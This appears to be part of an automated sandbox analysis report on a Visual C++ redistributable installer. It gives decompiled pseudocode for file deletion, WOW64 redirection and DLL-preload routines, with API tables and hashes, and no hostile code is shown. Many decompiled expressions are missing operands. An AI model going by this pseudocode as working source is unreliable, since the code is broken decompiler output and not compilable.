													_t133 =  >=  ? 0x80004005 :  <=  ? _t97 : _t97 & 0x0000ffff | 0x80070000;
													_push( >=  ? 0x80004005 :  <=  ? _t97 : _t97 & 0x0000ffff | 0x80070000);
													_push(0x132);
													goto L39;
												}
												_t133 = 0;
												goto L45;
											}
											_t89 = _v1648;
											continue;
										}
										L20:
										_v1078 = 0;
										_t93 = E00012D79(_t127, _v1652,  &(_v1640.cFileName),  &_v1644);
										_t133 = _t93;
										if(_t93 < 0) {
											goto L54;
										}
										_t94 = _v1640.dwFileAttributes;
										if(_v1656 == 0 || (_t94 & 0x00000010) == 0) {
											if(_v1660 == 0) {
												goto L35;
											}
											if((_t94 & 0x00000007) == 0 || SetFileAttributesW(_v1644, 0x80) != 0) {
												_t101 = DeleteFileW(_v1644); // executed
												if(_t101 != 0) {
													goto L35;
												}
												if(_t126 == 0) {
													_t102 = GetLastError();
													_t141 =  <=  ? _t102 : _t102 & 0x0000ffff | 0x80070000;
													_t98 = 0x80004005;
													_t133 =  >=  ? 0x80004005 :  <=  ? _t102 : _t102 & 0x0000ffff | 0x80070000;
													_push( >=  ? 0x80004005 :  <=  ? _t102 : _t102 & 0x0000ffff | 0x80070000);
													_push(0x125);
													goto L39;
												}
												if(GetTempFileNameW( &_v1048, L"DEL", 0,  &_v528) == 0) {
													_t106 = GetLastError();
													_t144 =  <=  ? _t106 : _t106 & 0x0000ffff | 0x80070000;
													_t98 = 0x80004005;
													_t133 =  >=  ? 0x80004005 :  <=  ? _t106 : _t106 & 0x0000ffff | 0x80070000;
													_push( >=  ? 0x80004005 :  <=  ? _t106 : _t106 & 0x0000ffff | 0x80070000);
													_push(0x115);
													goto L39;
												}
												_t108 = MoveFileExW(_v1644,  &_v528, 1);
												_push(4);
												_push(0);
												if(_t108 == 0) {
													_push(_v1644);
												} else {
													_push( &_v528);
												}
												MoveFileExW();
												goto L35;
											} else {
												_t112 = GetLastError();
												_t148 =  <=  ? _t112 : _t112 & 0x0000ffff | 0x80070000;
												_t98 = 0x80004005;
												_t133 =  >=  ? 0x80004005 :  <=  ? _t112 : _t112 & 0x0000ffff | 0x80070000;
												_push( >=  ? 0x80004005 :  <=  ? _t112 : _t112 & 0x0000ffff | 0x80070000);
												_push(0x10b);
												goto L39;
											}
										} else {
											_t114 = E00012B2E(_t127, _t132,  &_v1644);
											_t133 = _t114;
											if(_t114 < 0) {
												goto L54;
											}
											E00013BC3(_t130, _v1644, _a8); // executed
											L35:
											_t89 = _v1648;
											goto L36;
										}
									}
								}
								_t116 = GetLastError();
								_t151 =  <=  ? _t116 : _t116 & 0x0000ffff | 0x80070000;
								_t117 = 0x80004005;
								_t133 =  >=  ? 0x80004005 :  <=  ? _t116 : _t116 & 0x0000ffff | 0x80070000;
								_push( >=  ? 0x80004005 :  <=  ? _t116 : _t116 & 0x0000ffff | 0x80070000);
								_push(0xe7);
							} else {
								_t121 = GetLastError();
								_t154 =  <=  ? _t121 : _t121 & 0x0000ffff | 0x80070000;
								_t117 = 0x80004005;
								_t133 =  >=  ? 0x80004005 :  <=  ? _t121 : _t121 & 0x0000ffff | 0x80070000;
								_push( >=  ? 0x80004005 :  <=  ? _t121 : _t121 & 0x0000ffff | 0x80070000);
								_push(0xdc);
							}
							goto L3;
						} else {
							_t126 = _v1664;
							L45:
							_t100 = RemoveDirectoryW(_v1652); // executed
							if(_t100 != 0) {
								goto L54;
							}
							_t133 =  <=  ? GetLastError() : _t98 & 0x0000ffff | 0x80070000;
							if(_t133 != 0x80070020) {
								L50:
								if(_t133 >= 0) {
									goto L54;
								}
								L51:
								_push(_t133);
								_push(0x141);
								L39:
								_push("dirutil.cpp");
								E000137D3(_t98);
								goto L54;
							}
							if(_t126 == 0 || MoveFileExW(_v1652, 0, 4) == 0) {
								goto L51;
							} else {
								_t133 = 0;
								goto L50;
							}
						}
					} else {
						_t123 = GetLastError();
						_t157 =  <=  ? _t123 : _t123 & 0x0000ffff | 0x80070000;
						_t117 = 0x80004005;
						_t133 =  >=  ? 0x80004005 :  <=  ? _t123 : _t123 & 0x0000ffff | 0x80070000;
						_push( >=  ? 0x80004005 :  <=  ? _t123 : _t123 & 0x0000ffff | 0x80070000);
						_push(0xd1);
						L3:
						_push("dirutil.cpp");
						E000137D3(_t117);
						goto L56;
					}
				}
				_t124 = GetLastError();
				_t127 = 3;
				_t117 =  ==  ? _t127 : _t124;
				_t133 =  <=  ?  ==  ? _t127 : _t124 : ( ==  ? _t127 : _t124) & 0x0000ffff | 0x80070000;
				if(_t133 >= 0) {
					goto L4;
				}
				_push(_t133);
				_push(0xc8);
				goto L3;
			}













































                                                                          0x00013bc3
                                                                          0x00013bcc
                                                                          0x00013bd3
                                                                          0x00013bd9
                                                                          0x00013be3
                                                                          0x00013bf2
                                                                          0x00013bf5
                                                                          0x00013c0b
                                                                          0x00013c11
                                                                          0x00013c13
                                                                          0x00013c19
                                                                          0x00013c28
                                                                          0x00013c36
                                                                          0x00013c3f
                                                                          0x00013c45
                                                                          0x00013c4b
                                                                          0x00013c50
                                                                          0x00013c84
                                                                          0x00013c87
                                                                          0x00013fd3
                                                                          0x00013fd8
                                                                          0x00013fd8
                                                                          0x00013fe1
                                                                          0x00013fe4
                                                                          0x00013fe4
                                                                          0x00013fea
                                                                          0x00013ff1
                                                                          0x00013ff9
                                                                          0x00013ff9
                                                                          0x00014010
                                                                          0x00014010
                                                                          0x00013c90
                                                                          0x00013cd0
                                                                          0x00013cdf
                                                                          0x00013ce7
                                                                          0x00013d36
                                                                          0x00013d3b
                                                                          0x00013d3f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00013d52
                                                                          0x00013d58
                                                                          0x00013d61
                                                                          0x00013d88
                                                                          0x00013d8a
                                                                          0x00013d92
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00013d94
                                                                          0x00013d9d
                                                                          0x00013ebc
                                                                          0x00013ebc
                                                                          0x00013ec4
                                                                          0x00013ecc
                                                                          0x00013f51
                                                                          0x00013fae
                                                                          0x00013fbb
                                                                          0x00013fbe
                                                                          0x00013fc5
                                                                          0x00013fc8
                                                                          0x00013fc9
                                                                          0x00000000
                                                                          0x00013fc9
                                                                          0x00013f53
                                                                          0x00000000
                                                                          0x00013f53
                                                                          0x00013ece
                                                                          0x00000000
                                                                          0x00013ece
                                                                          0x00013db9
                                                                          0x00013dbb
                                                                          0x00013dd6
                                                                          0x00013ddb
                                                                          0x00013ddf
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00013dec
                                                                          0x00013df2
                                                                          0x00013e28
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00013e30
                                                                          0x00013e51
                                                                          0x00013e59
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00013e5d
                                                                          0x00013f2a
                                                                          0x00013f37
                                                                          0x00013f3a
                                                                          0x00013f41
                                                                          0x00013f44
                                                                          0x00013f45
                                                                          0x00000000
                                                                          0x00013f45
                                                                          0x00013e80
                                                                          0x00013f08
                                                                          0x00013f15
                                                                          0x00013f18
                                                                          0x00013f1f
                                                                          0x00013f22
                                                                          0x00013f23
                                                                          0x00000000
                                                                          0x00013f23
                                                                          0x00013e9b
                                                                          0x00013e9d
                                                                          0x00013e9f
                                                                          0x00013ea3
                                                                          0x00013eae
                                                                          0x00013ea5
                                                                          0x00013eab
                                                                          0x00013eab
                                                                          0x00013eb4
                                                                          0x00000000
                                                                          0x00013ed9
                                                                          0x00013ed9
                                                                          0x00013ee6
                                                                          0x00013ee9
                                                                          0x00013ef0
                                                                          0x00013ef3
                                                                          0x00013ef4
                                                                          0x00000000
                                                                          0x00013ef4
                                                                          0x00013df8
                                                                          0x00013dff
                                                                          0x00013e04
                                                                          0x00013e08
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00013e17
                                                                          0x00013eb6
                                                                          0x00013eb6
                                                                          0x00000000
                                                                          0x00013eb6
                                                                          0x00013df2
                                                                          0x00013d88
                                                                          0x00013d63
                                                                          0x00013d70
                                                                          0x00013d73
                                                                          0x00013d7a
                                                                          0x00013d7d
                                                                          0x00013d7e
                                                                          0x00013cff
                                                                          0x00013cff
                                                                          0x00013d0c
                                                                          0x00013d0f
                                                                          0x00013d16
                                                                          0x00013d19
                                                                          0x00013d1a
                                                                          0x00013d1a
                                                                          0x00000000
                                                                          0x00013f57
                                                                          0x00013f57
                                                                          0x00013f5d
                                                                          0x00013f63
                                                                          0x00013f6b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00013f7a
                                                                          0x00013f83
                                                                          0x00013f9f
                                                                          0x00013fa1
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00013fa3
                                                                          0x00013fa3
                                                                          0x00013fa4
                                                                          0x00013ef9
                                                                          0x00013ef9
                                                                          0x00013efe
                                                                          0x00000000
                                                                          0x00013efe
                                                                          0x00013f87
                                                                          0x00000000
                                                                          0x00013f9d
                                                                          0x00013f9d
                                                                          0x00000000
                                                                          0x00013f9d
                                                                          0x00013f87
                                                                          0x00013ca7
                                                                          0x00013ca7
                                                                          0x00013cb4
                                                                          0x00013cb7
                                                                          0x00013cbe
                                                                          0x00013cc1
                                                                          0x00013cc2
                                                                          0x00013c75
                                                                          0x00013c75
                                                                          0x00013c7a
                                                                          0x00000000
                                                                          0x00013c7a
                                                                          0x00013c90
                                                                          0x00013c52
                                                                          0x00013c59
                                                                          0x00013c5a
                                                                          0x00013c68
                                                                          0x00013c6d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00013c6f
                                                                          0x00013c70
                                                                          0x00000000

                                                                          APIs
                                                                          • GetFileAttributesW.KERNELBASE(?,?,?,?,00000001,00000000,?), ref: 00013C3F
                                                                          • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00013C52
                                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,00000001,00000000,?), ref: 00013C9D
                                                                          • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00013CA7
                                                                          • GetTempPathW.KERNEL32(00000104,?,?,?,?,00000001,00000000,?), ref: 00013CF5
                                                                          • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00013CFF
                                                                          • FindFirstFileW.KERNELBASE(?,?,?,*.*,?,?,?,?,00000001,00000000,?), ref: 00013D52
                                                                          • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00013D63
                                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00000001,00000000,?), ref: 00013E3D
                                                                          • DeleteFileW.KERNELBASE(?,?,?,?,?,?,?,00000001,00000000,?), ref: 00013E51
                                                                          • GetTempFileNameW.KERNEL32(?,DEL,00000000,?,?,?,?,00000001,00000000,?), ref: 00013E78
                                                                          • MoveFileExW.KERNEL32(?,?,00000001,?,?,?,00000001,00000000,?), ref: 00013E9B
                                                                          • MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,00000001,00000000,?), ref: 00013EB4
                                                                          • FindNextFileW.KERNELBASE(000000FF,?,?,?,?,?,?,?,00000001,00000000,?), ref: 00013EC4
                                                                          • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00013ED9
                                                                          • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00013F08
                                                                          • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00013F2A
                                                                          • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00013F4C
                                                                          • RemoveDirectoryW.KERNELBASE(?,?,?,?,00000001,00000000,?), ref: 00013F63
                                                                          • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00013F6D
                                                                          • MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,00000001,00000000,?), ref: 00013F93
                                                                          • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00013FAE
                                                                          • FindClose.KERNEL32(000000FF,?,?,?,00000001,00000000,?), ref: 00013FE4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLast$AttributesFindMove$Temp$CloseDeleteDirectoryFirstNameNextPathRemove
                                                                          • String ID: *.*$DEL$dirutil.cpp
                                                                          • API String ID: 1544372074-1252831301
                                                                          • Opcode ID: 1a9ea5af342d6a422290ea1bf03723a876072c0892f13c37c35465484c7cfe4a
                                                                          • Instruction ID: fb9772bfbaba695c79361eb8dd4e531f0bf8dcf01419f157c3d5eeea40112a57
                                                                          • Opcode Fuzzy Hash: 1a9ea5af342d6a422290ea1bf03723a876072c0892f13c37c35465484c7cfe4a
                                                                          • Instruction Fuzzy Hash: 7EB1A872E00735AAEB715A758C45BEBB6E9EF44710F0102A5ED08F7190DB369ED1CBA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00052F23 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 152libraryloadercomCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 62%
                                                                          			E00052F23(signed int _a4, intOrPtr* _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				char _v16;
				_Unknown_base(*)()* _v20;
				signed int _t38;
				signed int _t46;
				signed int _t53;
				signed int _t58;
				signed short _t61;
				signed int _t64;
				signed int _t65;
				intOrPtr* _t66;
				intOrPtr* _t67;
				signed int _t68;
				signed int _t69;
				signed int _t71;
				signed int _t74;
				signed int _t79;
				struct HINSTANCE__* _t81;
				signed int _t82;

				_t64 = 0;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				_t81 = GetModuleHandleA("kernel32.dll");
				if(_t81 != 0) {
					_t38 = GetProcAddress(_t81, "IsWow64Process");
					__eflags = _t38;
					if(_t38 == 0) {
						_t79 = 0;
						L9:
						__imp__CoCreateInstance(0x7b6c8, 0, 1, 0x5b808,  &_v8); // executed
						_t82 = 0x7b6c8;
						__eflags = 0x7b6c8;
						if(0x7b6c8 < 0) {
							L23:
							__eflags = _t64;
							if(_t64 == 0) {
								L26:
								L27:
								_t66 = _v12;
								if(_t66 != 0) {
									 *((intOrPtr*)( *_t66 + 8))(_t66);
								}
								_t67 = _v8;
								if(_t67 != 0) {
									 *((intOrPtr*)( *_t67 + 8))(_t67);
								}
								return _t82;
							}
							_t46 =  *_t79(_v16);
							__eflags = _t46;
							if(_t46 != 0) {
								goto L26;
							}
							ExitProcess(1);
						}
						_t68 = 0;
						__eflags = 0;
						_t74 = 0x7b6c8;
						while(1) {
							__eflags =  *((intOrPtr*)(_t74 + _t68 * 4)) -  *((intOrPtr*)(0x5b7f8 + _t68 * 4));
							_t74 = 0x7b6c8;
							if(__eflags != 0) {
								break;
							}
							_t68 = _t68 + 1;
							__eflags = _t68 - 4;
							if(_t68 != 4) {
								continue;
							}
							L17:
							 *0x7b6dc = 1;
							L18:
							__eflags = _a4;
							if(_a4 == 0) {
								L21:
								_v8 = _v8 & 0x00000000;
								 *_a8 = _v8;
								_t71 = _a12;
								__eflags = _t71;
								if(_t71 != 0) {
									_t29 =  &_v12;
									 *_t29 = _v12 & 0x00000000;
									__eflags =  *_t29;
									 *_t71 = _v12;
								}
								goto L23;
							}
							_t82 = E000530BF( &_v12, _v8, _a4,  &_v12);
							__eflags = _t82;
							if(_t82 < 0) {
								goto L23;
							}
							_t53 = _v8;
							_t82 =  *((intOrPtr*)( *_t53 + 0x54))(_t53, _v12, 0);
							__eflags = _t82;
							if(_t82 < 0) {
								goto L23;
							}
							goto L21;
						}
						_t69 = 0;
						__eflags = 0;
						while(1) {
							__eflags =  *((intOrPtr*)(_t74 + _t69 * 4)) -  *((intOrPtr*)(0x5b7e8 + _t69 * 4));
							_t74 = 0x7b6c8;
							if(__eflags != 0) {
								goto L18;
							}
							_t69 = _t69 + 1;
							__eflags = _t69 - 4;
							if(_t69 != 4) {
								continue;
							}
							goto L17;
						}
						goto L18;
					}
					_v20 = GetProcAddress(_t81, "Wow64DisableWow64FsRedirection");
					_t65 = GetProcAddress(_t81, "Wow64EnableWow64FsRedirection");
					_t79 = GetProcAddress(_t81, "Wow64RevertWow64FsRedirection");
					_t58 = _v20;
					__eflags = _t58;
					if(_t58 == 0) {
						L7:
						_t64 = 0;
						goto L9;
					}
					__eflags = _t65;
					if(_t65 == 0) {
						goto L7;
					}
					__eflags = _t79;
					if(_t79 == 0) {
						goto L7;
					}
					 *_t58( &_v16);
					_t64 =  *_t65(1) & 0x000000ff;
					goto L9;
				}
				_t61 = GetLastError();
				_t85 =  <=  ? _t61 : _t61 & 0x0000ffff | 0x80070000;
				_t82 =  >=  ? 0x80004005 :  <=  ? _t61 : _t61 & 0x0000ffff | 0x80070000;
				E000137D3(0x80004005, "xmlutil.cpp", 0x85, _t82);
				goto L27;
			}























                                                                          0x00052f32
                                                                          0x00052f34
                                                                          0x00052f37
                                                                          0x00052f3a
                                                                          0x00052f43
                                                                          0x00052f47
                                                                          0x00052f89
                                                                          0x00052f8b
                                                                          0x00052f8d
                                                                          0x00052fd0
                                                                          0x00052fd2
                                                                          0x00052fe5
                                                                          0x00052feb
                                                                          0x00052fed
                                                                          0x00052fef
                                                                          0x00053085
                                                                          0x00053085
                                                                          0x00053087
                                                                          0x0005309a
                                                                          0x0005309b
                                                                          0x0005309b
                                                                          0x000530a0
                                                                          0x000530a5
                                                                          0x000530a5
                                                                          0x000530a8
                                                                          0x000530ad
                                                                          0x000530b2
                                                                          0x000530b2
                                                                          0x000530bc
                                                                          0x000530bc
                                                                          0x0005308c
                                                                          0x0005308e
                                                                          0x00053090
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00053094
                                                                          0x00053094
                                                                          0x00052ff5
                                                                          0x00052ff5
                                                                          0x00052ff7
                                                                          0x00052ffc
                                                                          0x00053004
                                                                          0x00053007
                                                                          0x0005300c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0005300e
                                                                          0x0005300f
                                                                          0x00053012
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00053030
                                                                          0x00053030
                                                                          0x0005303a
                                                                          0x0005303a
                                                                          0x0005303e
                                                                          0x00053069
                                                                          0x0005306f
                                                                          0x00053073
                                                                          0x00053075
                                                                          0x00053078
                                                                          0x0005307a
                                                                          0x0005307f
                                                                          0x0005307f
                                                                          0x0005307f
                                                                          0x00053083
                                                                          0x00053083
                                                                          0x00000000
                                                                          0x0005307a
                                                                          0x0005304f
                                                                          0x00053051
                                                                          0x00053053
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00053055
                                                                          0x00053063
                                                                          0x00053065
                                                                          0x00053067
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00053067
                                                                          0x00053016
                                                                          0x00053016
                                                                          0x00053018
                                                                          0x00053020
                                                                          0x00053023
                                                                          0x00053028
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0005302a
                                                                          0x0005302b
                                                                          0x0005302e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0005302e
                                                                          0x00000000
                                                                          0x00053018
                                                                          0x00052f9d
                                                                          0x00052fa8
                                                                          0x00052fac
                                                                          0x00052fae
                                                                          0x00052fb1
                                                                          0x00052fb3
                                                                          0x00052fcc
                                                                          0x00052fcc
                                                                          0x00000000
                                                                          0x00052fcc
                                                                          0x00052fb5
                                                                          0x00052fb7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00052fb9
                                                                          0x00052fbb
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00052fc1
                                                                          0x00052fc7
                                                                          0x00000000
                                                                          0x00052fc7
                                                                          0x00052f49
                                                                          0x00052f5a
                                                                          0x00052f64
                                                                          0x00052f72
                                                                          0x00000000

                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,000534DF,00000000,?,00000000), ref: 00052F3D
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,0003BDED,?,000152FD,?,00000000,?), ref: 00052F49
                                                                          • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00052F89
                                                                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00052F95
                                                                          • GetProcAddress.KERNEL32(00000000,Wow64EnableWow64FsRedirection), ref: 00052FA0
                                                                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00052FAA
                                                                          • CoCreateInstance.OLE32(0007B6C8,00000000,00000001,0005B808,?,?,?,?,?,?,?,?,?,?,?,0003BDED), ref: 00052FE5
                                                                          • ExitProcess.KERNEL32 ref: 00053094
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$CreateErrorExitHandleInstanceLastModuleProcess
                                                                          • String ID: @Met$IsWow64Process$Wow64DisableWow64FsRedirection$Wow64EnableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$xmlutil.cpp
                                                                          • API String ID: 2124981135-2758322954
                                                                          • Opcode ID: bc4be2b5c7693c9cb108f40836c1ac6328d5199f34a36422cc16c8cea9a75a83
                                                                          • Instruction ID: 8771835b2737b647e8bfd06b8f85e800fb74549d0b942a6d5f88822c03dcbbb3
                                                                          • Opcode Fuzzy Hash: bc4be2b5c7693c9cb108f40836c1ac6328d5199f34a36422cc16c8cea9a75a83
                                                                          • Instruction Fuzzy Hash: 0541A331E00315ABDB209FA8C854BAFB7E4EF44752F114069ED05EB291D779DE488BA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00011070 Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 77fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00011070(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				char* _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				char* _v28;
				char* _v32;
				char* _v36;
				char* _v40;
				char* _v44;
				WCHAR* _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t24;
				void* _t29;
				void* _t33;
				void* _t35;
				void* _t40;
				intOrPtr _t41;
				void* _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t47;
				signed int _t48;
				void* _t49;
				signed int _t50;

				_t45 = __edx;
				_t42 = __ecx;
				_t24 =  *0x7a008; // 0xfbf51acb
				_v8 = _t24 ^ _t50;
				_t41 = _a4;
				_t46 = _a12;
				_t49 = _t48 | 0xffffffff;
				_v52 = 0;
				_v48 = 0;
				_v44 = L"cabinet.dll";
				_v40 = L"msi.dll";
				_v36 = L"version.dll";
				_v32 = L"wininet.dll";
				_v28 = L"comres.dll";
				_v24 = L"clbcatq.dll";
				_v20 = L"msasn1.dll";
				_v16 = L"crypt32.dll";
				_v12 = L"feclient.dll";
				if(E000133D7( &_v48, 0) >= 0) {
					_t40 = CreateFileW(_v48, 0x80000000, 5, 0, 3, 0x80, 0); // executed
					_t49 = _t40;
				}
				_t29 = E0001501B(_t46); // executed
				_t52 = _t29;
				if(_t29 == 0) {
					E00011174(_t42,  &_v44, 9);
				} else {
					E000111FB();
				}
				_t33 = E0001508D(_t42, _t45, _t52, _t41, _t49, _t46, _a16,  &_v52); // executed
				_t47 = _t33;
				if(_t49 != 0xffffffff) {
					FindCloseChangeNotification(_t49); // executed
				}
				if(_v48 != 0) {
					E000554EF(_v48);
				}
				_t35 =  <  ? _t47 : _v52;
				return E0003DE36(_t41, _v8 ^ _t50, _t45, _t47, _t49);
			}
































                                                                          0x00011070
                                                                          0x00011070
                                                                          0x00011076
                                                                          0x0001107d
                                                                          0x00011081
                                                                          0x00011088
                                                                          0x0001108b
                                                                          0x0001108f
                                                                          0x00011092
                                                                          0x00011099
                                                                          0x000110a0
                                                                          0x000110a7
                                                                          0x000110ae
                                                                          0x000110b5
                                                                          0x000110bc
                                                                          0x000110c3
                                                                          0x000110ca
                                                                          0x000110d1
                                                                          0x000110df
                                                                          0x000110f6
                                                                          0x000110fc
                                                                          0x000110fc
                                                                          0x000110ff
                                                                          0x00011104
                                                                          0x00011106
                                                                          0x00011115
                                                                          0x00011108
                                                                          0x00011108
                                                                          0x00011108
                                                                          0x00011124
                                                                          0x00011129
                                                                          0x0001112e
                                                                          0x00011131
                                                                          0x00011131
                                                                          0x0001113b
                                                                          0x00011140
                                                                          0x00011140
                                                                          0x0001114d
                                                                          0x0001115d

                                                                          APIs
                                                                            • Part of subcall function 000133D7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,000110DD,?,00000000), ref: 000133F8
                                                                          • CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000,?,00000000), ref: 000110F6
                                                                            • Part of subcall function 00011174: HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,0001111A,cabinet.dll,00000009,?,?,00000000), ref: 00011185
                                                                            • Part of subcall function 00011174: GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,0001111A,cabinet.dll,00000009,?,?,00000000), ref: 00011190
                                                                            • Part of subcall function 00011174: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0001119E
                                                                            • Part of subcall function 00011174: GetLastError.KERNEL32(?,?,?,?,0001111A,cabinet.dll,00000009,?,?,00000000), ref: 000111B9
                                                                            • Part of subcall function 00011174: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 000111C1
                                                                            • Part of subcall function 00011174: GetLastError.KERNEL32(?,?,?,?,0001111A,cabinet.dll,00000009,?,?,00000000), ref: 000111D6
                                                                          • FindCloseChangeNotification.KERNELBASE(?,?,?,?,0005B4C0,?,cabinet.dll,00000009,?,?,00000000), ref: 00011131
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AddressErrorFileLastModuleProc$ChangeCloseCreateFindHandleHeapInformationNameNotification
                                                                          • String ID: cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msasn1.dll$msi.dll$version.dll$wininet.dll
                                                                          • API String ID: 2670336470-3151496603
                                                                          • Opcode ID: cb18841df104a759d3fdfea2bb6331445b67461286eb6e559c795be7ef172b8d
                                                                          • Instruction ID: fada86546bff0d9930af5ce0fec7ddae8380244117806ade44afe8ea1ea0130a
                                                                          • Opcode Fuzzy Hash: cb18841df104a759d3fdfea2bb6331445b67461286eb6e559c795be7ef172b8d
                                                                          • Instruction Fuzzy Hash: 67214171900218ABDB209FA5DC45BEFBBB8FF49715F504119FA20B7292D774A948CFA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0004FDC2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130threadtimeCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 55%
                                                                          			E0004FDC2(void* __edi, intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				struct _SYSTEMTIME _v24;
				signed int _v28;
				signed int _v32;
				long _v36;
				long _v40;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t34;
				void* _t39;
				intOrPtr* _t42;
				void* _t43;
				signed int _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t51;
				intOrPtr _t58;
				void* _t60;
				intOrPtr _t61;
				void* _t68;
				signed int _t73;
				char* _t75;
				signed int _t76;
				void* _t79;

				_t70 = __edi;
				_t34 =  *0x7a008; // 0xfbf51acb
				_v8 = _t34 ^ _t76;
				_t61 = _a12;
				_t74 = 0;
				_v28 = _v28 & 0;
				_v32 = _v32 & 0;
				_t79 =  *0x7b634 - _t74; // 0x0
				if(_t79 != 0) {
					L19:
					return E0003DE36(_t61, _v8 ^ _t76, _t68, _t70, _t74);
				}
				EnterCriticalSection(0x7b60c);
